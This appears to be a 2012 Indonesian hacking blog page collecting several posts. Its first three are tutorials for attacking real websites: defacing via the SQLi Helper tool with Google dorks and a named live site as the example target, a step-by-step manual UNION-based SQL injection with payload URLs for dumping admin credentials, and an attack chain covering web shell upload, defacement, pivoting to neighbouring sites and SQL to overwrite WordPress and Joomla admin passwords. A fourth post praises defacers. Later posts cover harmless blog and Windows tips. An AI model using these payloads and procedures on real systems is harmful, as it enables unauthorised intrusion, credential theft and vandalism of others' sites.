Pasang iklan Anda di sini.
http://goo.gl/ad3AU2

46 Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Minggu, Maret 18, 2012
Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7 | Cirebon-Cyber4rt - Ada tutorial hacking website lagi nihlumayan SQL Injection. Kalo sebelumnya saya pernah share tentang Cara Deface Website Forum Sederhana Untuk Newbie yang tutorialnya pake skema "order+by+bla.. bla.. bla" nah sekarang saya akan share tentang cara deface lagi nih sob, tapi yang ini lebih mudah karena kita pake tools, jadi tinggal klak-klik aja juga kelar.

http://cirebon-cyber4rt.blogspot.com/2012/03/cara-deface-website-dengan-menggunakan_18.html
Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7

Tapi ada efek sampingnya juga pake cara ini, Bikin Orang Jadi Males hahaha :D Tapi kalo udah tau dasarnya yang pake "order+by+ bla... bla..." it's ok lah, yang penting kita tau jalannya klo disuruh manual, kalo belum tau cara manualnya baca ini dulu Cara Hacking Website Dengan Teknik SQL Injection :D

Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7
Yang pertama dan wajib ada yaitu Toolsnya:

Download Link :
Langkah kedua adalah mencari website yang vulnerabillity ( terdapat celah keamanan ), Lah carinya dimana? gampang sob, cari aja di Google :D ada banyak disana. Akh males nyarinya, yaudah nih aku kasih dorknya aja biar lebih mudah. Caranya? caranya masukan dork dibawah ini ke mesin pencarian Google, nanti muncul seribu satu macam website yang sama, nah tinggal kamu pilih satu-satu, cari yang vuln ( terdapat celah keamanan ), OK.

Google Dork SQL Injection :
  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:games.php?id=
Maka akan muncul seribu satu macam website yang url-nya mirip seperti yang saya contohkan diatas. Sebenarnya masih banyak script atau dork SQL yang bisa kita dapatkan di internet. Nanti di artikel berikutnya, saya akan coba memberikannya secara lengkap untuk sobat.

Langkah ketiga, Sebelum memulai attacking kita harus menemukan website yang bisa dihack ( vulnerabillity ). Dari ribuan website dari dork yang saya berikan diatas, belum tentu salah satunya yang bisa dihack. Untuk mengetahuinya kita harus memberi tanda petik di akhir alamat website.
Contohhttp://www.wheelieboymotorsports.com/product_detail.php?pid=316 menjadi http://www.wheelieboymotorsports.com/product_detail.php?pid=316'. Jika terdapat tulisan :


Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

Berarti Web tersebut Vuln.
Copy Url yang sobat dapatkan tadi ke kolom target.
Contoh: http://www.wheelieboymotorsports.com/product_detail.php?pid=316. ( tidak pakai tanda petik )


Kemudian klik Inject. Maka secara otomatis tools akan memeriksa ulang apakah url tersebut vuln atau tidak, versi database, supports union, dll. Jika Inject berhasil akan muncul tampilan seperti ini.


Kalau sudah klik Get Database.
*Di contoh muncul 2 Database name. Information schema dan natural. Pilih database selain Information schema. Seperti contoh dibawah, saya memilih database natural. Selanjutnya klik Get Tables.


Akan muncul beberapa list Tables yang ada. Sekarang tugas kita tinggal mencari tabel yang berisikan username dan password administratornya. Biasanya nama tabelnya tidak jauh-jauh dari admin_user, admin_login, atau apapun yang berbau informasi login admin.


Langkah Keempat, Kolom SQL
Jika sudah pilih User kalian klik get Coloumns.
Di Coloumns block yang usr_login dan usr_pass atau user_name dan password_admin lalu klik Dump Now.


Setelah itu akan muncul tampilan seperti ini


Pilih salah satu dari user login dan user password tersebut.
Ada yang aneh? Password yang ditampilkan bentuknya kok seperti ini ya?
  • 987d29241cc4f2a7465f2d9356ab3615
  • 987d29241cc4f2a7465f2d9356ab3615
Langkah Kelima, MD5 Password
Password tersebut dienkripsi dengan menggunakan metode MD5. Jadi kita harus menterjemahkan kode tersebut menjadi password yang sebenarnya. Nah, bagaimana caranya?

Caranya cukup mudah, buka saja situs MD5 Crack, lalu masukkan kode tersebut dikotak penelusuran. Berdo'a saja password yang sobat dapatkan tersebut cukup lemah, sehingga bisa dipecahkan dengan metode Bruto Force. Setelah sobat masukkan, lalu klik Crack hash baby.

Selesai. sekarang cari halaman login atau adminnya.
Ada beberapa contoh halaman login yang bisa sobat pakai

http://target.com/admin.htmlhttp://target.com/admin.php
NOTE - Bagi yang PC nya kedetect virus atau takut PC nya kena virus, bisa pake sandboxie biar lebih aman Click Here

Sekian postingan saya kali ini tentang Cara Deface Website Dengan Menggunakan Tools SQLi Helper 2.7 , mungkin bagi yang belum tau teknik SQLi Injection cara diatas masih sangat sulit untuk dipahami, tapi saya yakin dengan latihan dan ketekunan pasti sobat akan paham.



31 Cara Hacking Website Dengan Teknik SQL Injection

Selasa, Maret 13, 2012
Pengertian SQL InjectionSQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100

    Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100' atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Step 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya...
    gunakan perintah: order by

    Contoh:

    [site]/berita.php?id=-100+order+by+1-- atau
    [site]/berita.php?id=-100+order+by+1/*

    Ceklah secara step by step (satupersatu)...
    Misal:

    [site]/berita.php?id=-100+order+by+1--
    [site]/berita.php?id=-100+order+by+2--
    [site]/berita.php?id=-100+order+by+3--
    [site]/berita.php?id=-100+order+by+4--

    Sehingga muncul error atau hilang pesan error...
    Misal: [site]/berita.php?id=-100+order+by+9--

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8--
[ Step 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

    ok seumpama yg keluar angka 5

    gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

    Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

    Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

    Code:

    [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

    Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.​tables+where+table_schema=database()--
[ Step 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0xhexa--

    Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :

    http://www.v3n0m.net/ascii.htm

    Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0x61646D696E--
[ Step 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

    perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

    Contoh kata yang keluar adalah id,username,password

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
[ Step 8 ]
  • Tahap terakhir mencari halaman admin atau login.
Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D

Source: 
Hacker Newbie



2 Beberapa Pengertian-Pengertian Dasar dan Alur Web Attack

Selasa, Maret 13, 2012
Beberapa Pengertian-Pengertian Dasar dan Alur Web AttackAda berbagai cara yang dilakukan oleh seorang hacker untuk mencari kelemahan sebuah sistem website. Sehingga mereka bisa menghack website tersebut. Ada berbagai tujuan seorang hacker dalam hack website mencuri informasi pengguna, sampai hanya sekedar iseng saja.


Gambaran Web Attack:
Scan > XPL/SQLi > Upload Shell > Deface/Jumping > Rooting

- Scan
  • Scan - Yaitu mencari tau dimana letak kelemahan web target. Bisa discan pake beberapa tool scanner. Diantar'a yang paling terkenal:
    Acunetix [ Windows ]
    Nikto [ Linux ]
    Selain dapat mendapatkan bug kita juga dengan tool itu akan dapat mengumpulkan informasi berguna dari web target.
- XPL/SQLi
  • XPL/SQLi -  Setelah kita dapat menemukan data-data dari web target. Kita coba cari cara untuk meng-Exploitasi bug-bug yang sudah kita temukan dengan tool scanner tadi. Dibawah ini adalah daftar situs yang menyediakan macam-macam Exploit:
    Exploit Database
    Inj3ct0r
    Packet Storm
    Apabila target menggunakan CMS Joomla/Wordpress, kita dapat mencari Exploit untuk plugin-plugin yang digunakan web target. Karena dengan tool scanner diatas kita diberikan informasi seakan-akan web target sudah dibedah keseluruhannya. Jadi kita tahu isi folder dari web target, termasuk plugin-plugin apa saja yang digunakan.
  • Kalau teknik SQLi dapat dilihat disini: SQLi Tutorial [ Download ]
- Upload Shell
  • Upload Shell -  Kalau Website sudah bisa di Exploitasi dan kita sudah bisa masuk ke halaman panel admin. Tinggal kita upload shellnya sekarang:
    Upload shell di Wordpress bisa mengupload plugin or thema yang sudah disisipi file shellnya.
    Upload shell di Joomla juga sama, cuma bisa juga menggunakan Plugin Ninja Explorer
    Upload Shell di CMS biasa bisa melalui menu upload gambar, kalau tidak bisa coba shellnya direname menjadi shell.php shell.jpg lalu upload.
    Setelah shell berhasil diupload tinggal panggil letak URL shellnya dimana.
- Deface/Jumping
  • Deface/Jumping - Kalau pengen gaya-gaya'an ( Deface ) Cari file index.php lalu ubah file didalamnya dengan script Deface yang kita punya. Bagi yang malas bikin script deface, dapat menggunakan tool Deface Maker Kemudian arsipkan website yang sudah kita deface disitus:
    Indonesian Defacer - Suspensed
    Magelang Cyber - Not Active
    Zone-h - Active
  • Tidak cukup hanya bisa men-Deface satu web saja. Coba gunakan teknik jumping untuk masuk ke web yang satu server sama web yang telah kita deface. Caranya ?
    Script Code: Click Here
    - Upload script jumpingnya
    - Rename menjadi jumpingfinder.php
    - Panggil letak file URL tersebut
    - Masuk ke public_html web target
    - Masuk ke MySQL nya [ Cari account MySQL difile config ]
    - Cari table user
    - Update password user admin
  • Dibawah ini ada script khusus untuk update user password admin:
    #Wordpress [ PHP Code ]
    UPDATE `note_wrdp1`.`wp_users` SET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1;

    #Joomla [ PHP Code ]
    update `jos_users` set `password`="ece4f1e9e99fe6ca77c100d02cf4aa60" where `username`="admin"; 
  • Password admin sudah berhasil diupdate, tinggal ikuti seperti langkah nomor 3. 
- Rooting
  • Rooting - pada tahap ini kita bisa nyantai, karena semua step sudag terlewati.
Sekian postingan saya kali ini tentang Beberapa Pengertian-Pengertian Dasar dan Alur Web Attack, walau agak panjang penjelasannya, saya yakin sobat mengerti  :*

Source: Hacker Newbie 



20 Free Download Call Of Duty Modern Warfare 3

Selasa, Maret 13, 2012
Free Download Call Of Duty Modern Warfare 3 - Pasti sobat sudah tahu Game paling populer di dunia ini, Call of Duty. Kali ini Call of Duty merilis versi terbarunya, yaitu Call of Duty Modern Warfare 3. Menurut saya, Call of Duty Modern Warfare 3 ini sudah memiliki efek dan grafik yang cukup bagus, bahkan bisa dibilang grafik dan kualitas suara dan gambar Call of Duty Modern Warfare 3 ini terbilang Sempurna dibandingkan dengan game sejenisnya. Seperti Counter Strike, Battlefield, Crysis, atau Point Blank.

Screenshot:


Minimum System Requirements:
  • Operating System Windows XP, Vista and 7
  • RAM 2 GB
  • VGA 256 MB Support Pixel Shader 3.0 - GeForce / ATI Radeon
  • 16 GB HDD Free Space
  • Processor: Intel Dual-Core 2.8 Ghz or Higher
  • DirectX 9.0 Compatible
Download Links: Call Of Duty Modern Warfare 3 | 5.8 GB
Password: mediafire-games4u

Sekian postingan saya kali ini tentang Free Download Call Of Duty Modern Warfare 3 , selamat bermain ya sob hehehe :D Jangan lupa follow blog ini ya !



9 Game Booster Version 3.0 Free Download

Selasa, Maret 13, 2012
Game Booster Version 3.0 Free Download - Bagi yang suka maen game tapi kesal karena game yang dimainkan berjalan lambat, lemot, dan membuat game tersebut tidak asyik lagi. Nah kebetulan saya punya sofware bagus nih buat para pecinta game-game PC yang lumayan berat. Nama softwarenya Game Booster, yups software ini mampu membuat game yang terasa berat menjadi ringan.

Screenshot:

Game Booster Version 3.0  adalah software yang bisa sobat gunakan untuk mengoptimalkan kinerja komputer saat sobat gunakan untuk bermain game. Dengan kombinasi fitur optimasi yang ampuh, Game Booster mampu mempercepat komputer sobat saat anda gunakan untuk bermain game.

Fitur - Fitur Game Booster Version 3.0 :
  • Mendefrag game files dengan cepat.
  • Menjamin Driver Hardware sobat Up to Date.
  • Memiliki Game Box untuk mengatur game favorit sobat dengan mudah.
  • Melakukan Tune Up setting game secara optimal.
  • Bisa digunakan dengan 100% Aman.
Download Link: Game Booster Version 3.0 | 5.45 MB
Password : cirebon-cyber4rt

Sekian postingan kali ini tentang Game Booster Version 3.0 Free Download, semoga softwarenya bisa bermanfaat bagi sobat semua.



20 Daftar 10 Defacer yang Mengharumkan Nama Indonesia

Selasa, Maret 13, 2012
Daftar 10 Defacer yang Mengharumkan Nama Indonesia | Cirebon-Cyber4rt - Pada tau deface kan? Yap benar sekali, salah satu Seni hacking yang merubah index suatu website. Udah tau? Bahwa defacer Indonesia yang active (Bisa di Bilang Mengesankan) Ini saya kutib dari beberapa sumber MagelangCyber, Indonesian Defacer, Archive Santri Cyber & Zone-H.

http://cirebon-cyber4rt.blogspot.com/2012/03/daftar-10-defacer-yang-mengharumkan.html

Banyak yang bilang Seni hacking ini banyak dilakukan (Para Lamer), tidak semua defacer Begitu! Berikut Daftar 10 Defacer yang Mengharumkan Nama Indonesia :

  1. kaMtiEz - Adalah salah satu orang lama dalam bidang Deface Mendeface Ini, Diapun di kenal Dengan Crewnya (Magelang Cyber) & Indonesian Coder. Defacer satu ini wajib di acungi Jempol.
  2. Jundab - Dia adalah teman dari KaMitiEz itu sendiri, banyak yang bilang bahwa defacer satu Ini (Berbau Jihad) (Terlihat pada Html Defaced Nya Sendiri) diapun dikenal dengan Mass Junz Magelang Cyber.
  3. Hmei7 - Mempunyai Skill Vb6 yang memadai & yang sering menyatroni Forum Underground Ini berasal Dari semarang. Diapun Bisa di kenal teman Mas Junz & Kamitiez, Jangan anggap enteng defacer satu ini.
  4. Kal0ng666 - Kal0ng666 (Dari Nick saja) Kalian sudah bisa menebak salah satu attacker Situs Pemerintah & Forum Underground ini. Dari Pekalongan (Pekalongan Blackhat). Tentu saja dengan team/teman, seperti Hmei7, kaMitiEz & Jundab dia cepat dikenal Masyarakat Dunia maya !
  5. Dr.Cruzz - Dr.Cruzz adalah salah seorang Staff Indonesiancoder, terlihat dari sifat misteriusnya. Dari dia mendeface forum Hacking Regional ternama (PalembangHackerLInk) Nama dia terkenal sejak aksi Defacenya, di PHL Defacer satu ini Wajib Kita acungi 4 jempol XD
  6. Al3x_0wn5 - Defacer satu ini juga pernah melakukan deface pada situs regional lainya. terdengar dia anak Medan (Yang menentang Forum Regional Sendiri) yap medan Cyber, Tapi dengan skill yang memadahi Alex pantas kita anggap sebagai Top 10 Indonesian Defacer.
  7. Ho1onk - Kebalikan Al3x, si Ho1onk Ini adalah orang penting di (Hacker-Newbie) dia Menajabat sebagai Mod (Admin di MedanCYberTeam) << yang di Benci Al3x, dan Juga keahliannya di Bidang mIRC memaksa kita angkat kaki dah, Archive yang rata-rata webshop membuat pada carder marah. Dia pantas disebut menjilat lidah sendiri.
  8. BaghazzNewbie23 - Defacer satu ini sudah terkenal di google, apa lagi dengan wordpress, wordpress yang dia deface. dia pantas Mendapatkan Profesional Security Wordpres.
  9. Marwanz - Disini saya Melihat dia Baru Masuk (20 Besar Di IndevEs), Tapi website yang dia archivekan sendiri harus membuat saya mengakui bahwa dia memang top, dan Kami Banyak Melihat (user satu ini) Memiliki Banyak masalah kepada defacer Besar (enteh kenapa?).
  10. Onestree - Defacer , yang mempunyai banyak teman ini, adalah Pemimpin dari IslamCYber, yang sampai kini onestree terus mengahajar situs Malay.
Mungkin segitu dulu yang dapat saya Kutip dari Indonesian Defacer Archives.

Ada Defacer yang Mengharumkan nama Indonesia & ada juga yang Menghancurkan nama Indonesia, semua tergantung dari pribadi masing-masing. Salam Olahraga !

Source: kaskus

Daftar 10 Defacer yang Mengharumkan Nama Indonesia
out of 10 based on 10 ratings. 6 user reviews.



36 Cara Membuat Auto Refresh/Reload Otomatis Untuk Blogspot

Senin, Maret 12, 2012
Cara Membuat Auto Refresh Untuk Blogspot | Cirebon-Cyber4rt Kali ini saya akan posting tentang cara membuat auto refresh untuk blogspot.

Sobat pasti sudah tahu tentunya apa yang dimaksud dengan auto-refresh, ya betul...
yaitu me-load halaman blog berulang-ulang sesuai dengan waktu yang di tentukan oleh pemilik blog. Tidak usah basa-basi lagi, langsung aja dipraktekan cara membuat auto refresh untuk blogspot.

Cara Membuat Auto Refresh Untuk Blogspot :
  1. Login ke Blogger
  2. Pilih  Design > Edit HTML
  3. Cari kode </head>
  4. Letakan kode dibawah ini setelah kode </head>
<meta content='200' http-equiv='refresh'/>

Keterangan :
Yang berwarna merah berarti blog sobat akan me-refresh setiap 200 detik. Bisa diganti sesuai dengan keinginan sobat. Sekian posting saya kali ini, semoga bermanfaat buat sobat blogger semua.



13 Cara Membuat Folder yang Tidak Bisa di Hapus/Delete

Senin, Maret 12, 2012
Cirebon-Cyber4rt - Setelah Sebelumnya saya memposting Cara Menghapus Data Folder yang Tidak Bisa Di Hapus, sekarang saya akan memposting Cara Membuat Folder Tidak Bisa di Hapus. Pembuatan folder yang tidak bisa di hapus bisa untuk mengatasi virus autorun.inf yang metodenya sama seperti SmadAv agar autorun.inf tidak ditempa lagi dengan autorun.inf palsu alias virus.

Nah untuk Membuat Folder Tidak Bisa Di Hapus mudah saja, kali ini tidak menggunakan software, tetapi dengan menggunakan command prompt.

Berikut Caranya :
  1. Buka Command Prompt [ Start > Run > CMD ]
  2. Ketikkan perintah mkdir C:\autorun.inf
  3. Buat Folder con mkdir \\.\C:\autorun.inf\con  [ Folder ini tidak bisa dihapus jadi beware ]
  4. Lalu buat lagi Folder aux mkdir \\.\C:\autorun.inf\con\aux
  5. Lalu buat lagi folder nul mkdir \\.\C:\autorun.inf\con\aux\nul
Folder tersebut hanya sebagian dari folder yang tidak bisa dihapus oleh sistem windows, dikarenakan nama tersebut adalah system variable windows. Selain itu ada juga NUL, COM1, COM2, COM3, LPT1, LPT2, LPT3, COM1 hingga COM9, dan LPT1 hingga LPT9.

Maka dari itu membuat folder dengan nama tersebut dengan cara manual atau tidak menggunakan cara diatas tidak bisa dihapus makanya ditaruh di dalam autorun.inf supaya tidak ditimpa lagi dengan autorun.inf virus. Tapi masih bisa diakalin juga sih.



17 Cara Membuka Disable Klik Kanan Pada Blog yang Diproteksi

Senin, Maret 12, 2012
Cara Membuka Disable Klik Kanan Pada Blog yang Diproteksi | Cirebon-Cyber4rtPastinya sobat kesal dengan blog yang ingin sobat copas tidak bisa mengklik kanan, Nah sebenarnya ada cara mudah untuk membuka disable klik kanan di blog.

Mendisable klik kanan menggunakan javascript pada browser
. Kalau browsernya di disable javascriptnyaOtomatis fitur disable klik kanan tidak akan bisa digunakan lagi. Nah cara membuka disable klik kanan pada blog yaitu dengan mendisable javascript pada browser sobat.


Nah berikut 
disable javascript untuk membuka disable klik kanan pada blog pada browser - browser tertentu :

Membuka Disable Klik Kanan di Chrome
  1. Klik Options > Under the Hood > Content Settings
  2. Pilih opsi Do not allow any site to run JavaScript
Membuka Disable Klik Kanan di Mozilla Firefox
  1. Klik Alat > Pengaturan > Isi
  2. Hapus centang Aktifkan JavaScript
Membuka Disable Klik Kanan di Opera
  1. Klik Menu > Settings > Preferences
  2. Klik Tab Advanced
  3. Di Content hapus centang Enable JavaScript
Hanya 3 browser yang saya tahu, kalau di Internet Explorer atau Safari coba saja cari sendiri untuk disable javascript. Begitulah Cara Membuka Disable Klik Kanan Pada Blog yang Diproteksi, yang intinya hanya disable javascript. Sekian saja postingan saya kali ini semoga bisa bermanfaat.



Contact

Nama

Email *

Pesan *